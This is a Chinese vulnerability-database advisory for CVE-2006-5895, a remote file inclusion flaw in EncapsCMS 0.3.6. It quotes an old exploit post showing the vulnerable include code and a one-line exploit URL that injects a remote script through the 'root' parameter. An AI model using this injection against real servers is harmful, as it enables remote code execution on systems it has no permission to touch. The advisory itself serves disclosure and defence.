EncapsCMS core/core.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111513 漏洞类型 输入验证
发布时间 2006-11-10 更新时间 2007-01-08
CVE编号 CVE-2006-5895 CNNVD-ID CNNVD-200611-208
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2750
https://cxsecurity.com/issue/WLB-2006110051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-208
|漏洞详情
EncapsCMS的core/core.php存在PHP远程文件包含漏洞,远程攻击者可以通过root参数中的URL执行任意PHP代码。
|漏洞EXP
########################### Firewall ###########################
encapscms 0.3.6  - Remote File Include by Firewall
BuG FounD by Firewall

# Application Affect:
encapscms 0.3.6

# Sorce Code:            
http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip

# Code:
         include_once($root."core/Config.php");
         include_once($root."core/DB_sql.php");
         include_once($root."core/BlogsCats.php");
         include_once($root."core/Block.php");
         include_once($root."core/Block_sub.php");
         include_once($root."core/Gallery.php");
         include_once($root."core/Pager.php");
         include_once($root."core/GalleryCategory.php");
         include_once($root."core/Misc.php");
       
# ExPloit :
http://www.site.com/encapscms_PATH/core/core.php?root=[Evil Script]

#Contact:    Firewall1954@hotmail.com 


# GrEatZ :
|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH| |Cvir.System|napster|saok|Zlevyn|Azrael|CyberAlexis| |NitroNet|Matasanos|SysRoot|ANtrAX|FaLENcE|Mnox|Xneo.System|

"El ceviche y El pisco es peruano y jamas podran igualar su calidad" - "Viva el Peru"

########################### Firewall ###########################

# milw0rm.com [2006-11-10]
|参考资料

来源:XF
名称:encapscms-core-file-include(30198)
链接:http://xforce.iss.net/xforce/xfdb/30198
来源:BID
名称:21001
链接:http://www.securityfocus.com/bid/21001
来源:BUGTRAQ
名称:20061110encapscms0.3.6-RemoteFileIncludebyFirewall
链接:http://www.securityfocus.com/archive/1/archive/1/451298/100/0/threaded
来源:OSVDB
名称:30368
链接:http://www.osvdb.org/30368
来源:MILW0RM
名称:2750
链接:http://www.milw0rm.com/exploits/2750
来源:VUPEN
名称:ADV-2006-4481
链接:http://www.frsirt.com/english/advisories/2006/4481
来源:VIM
名称:20061114SourceVERIFY-encapscms0.3.6RFI
链接:http://www.attrition.org/pipermail/vim/2006-November/001123.html
来源:SECUNIA
名称:22820
链接:http://secunia.com/advisories/22820
来源:SREASON
名称:1848
链接:http://securityreason.com/securityalert/1848
来源:MILW0RM
名称:2750
链接:http://milw0rm.com/exploits/2750